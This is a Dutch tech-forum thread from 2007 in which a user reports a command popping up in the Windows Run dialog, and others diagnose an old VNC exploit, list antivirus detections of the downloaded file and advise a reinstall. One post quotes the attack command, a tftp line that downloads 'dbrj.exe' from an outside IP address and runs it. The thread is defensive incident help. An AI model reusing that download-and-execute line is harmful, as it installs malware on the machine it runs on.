Opeens een scherm met tftp IP-adres GET bdrj.exe *

hmm hij checked je versie van je Windows, opent een tftp sessie naar *knip*, download dan de dbrj.exe en start m.

niet echt mooi!

edit: doe ff virusscan/spywarescan

[ Voor 24% gewijzigd door pasta op 29-01-2007 21:09 ]

Het feit dat het bij de uitvoer regel zit betekend dat je die code al een keer hebt gebruikt...

Verwijderd schreef op maandag 29 januari 2007 @ 19:35:
Ik weet niet wat er precies gebeurde, maar ik zat te typen opent het " uitvoeren " venster zich en de volgende opdracht regel verschijnt: %comspec% /c tftp -i 83.226.184.184 GET dbrj.exe & start dbrj.
Vervolgens wordt cmd geopend en schiet mijn vuurmuur in de stress???

Kan iemand mij vertellen wat hier is gebeurd??????

Trojan? Virus?
Waar zat je in te typen?
Want zo te zien wordt er zooi gedownload en uitgevoerd.

www.dbrj.com
lol

heb je vnc draaien? updaten naar de laatste versie

Verwijderd schreef op maandag 29 januari 2007 @ 19:37:
Het feit dat het bij de uitvoer regel zit betekend dat je die code al een keer hebt gebruikt...

ik lees uit de TS post dat het vanzelf gebeurde. terwijl hij met heel iets anders bezig was

even die dbrj.exe uploaden naar http://virusscan.jotti.org/

Verder even HijackThis logje posten, en virusscannen?

Verwijderd schreef op maandag 29 januari 2007 @ 19:42:
M$ wordt

WTF?

[ Voor 35% gewijzigd door TheZeroorez op 29-01-2007 19:44 ]

Wat hierboven al werd geopperd: je bent de sjaak.
Infectie te pakken, dus direct de juiste en adequate maatregelen treffen, hoogstwaarschijnlijk weet je wel welke ik bedoel.

is een exploit van vnc, al een tijd bekend... uitzetten en updaten die hap!
met oude versie is het mogelijk zonder wachtwoord in te loggen, dmv van een exploit.

toen ik dit zag gebeuren schrok ik zelf ook behoorlijk, draai nu geen vnc meer

[ Voor 53% gewijzigd door DeeJayV op 29-01-2007 19:47 ]

M$ wordt

Ik snap nu wat er hier bedoeld wordt:

Het niveau op GoT en MSN jeugd wat T.net bestormd

AntiVir Found: HEUR/Malware
BitDefender Found: Generic.Malware.SWYdld.87D41066
Dr.Web Found: BACKDOOR.Trojan (probable variant)
NOD32 Found: probably unknown NewHeur_PE (probable variant)

Internetaansluiting er uit, formatteren, opnieuw installeren, Windows updaten, nu wel fatsoenlijk beveiligen, goede virusscanner updaten, backup terugzetten, internetaansluiting er weer in.

Als je een backup hebt dan, anders van ellende maar je aangetaste systeem eerst backuppen en later voorzichting weer benaderen.

En doe rustig, het is toch al veel te laat... Pro forma verander ik even de topictitel van 'Help! wat gebeurt er? bdrj.exe???', maar ik geloof dat we al wel klaar zijn.

Overigens zou ik als ik jou was ook even een mailtje richting abuse@bredband.com sturen over deze gebruiker. Waarschijnlijk is het een of ander scriptkiddy en krijgt ie hiermee op z'n kop van z'n pappie.

Verwijderd schreef op maandag 29 januari 2007 @ 21:08:
Waarschijnlijk is het een of ander scriptkiddy en krijgt ie hiermee op z'n kop van z'n pappie.

De malware in kwestie is o.a. een email harvester. There's money involved.
Voor zover het nog niet zeker was: De inhoud van de malware zelf bevestigt dat het idd via VNC binnen is gekomen.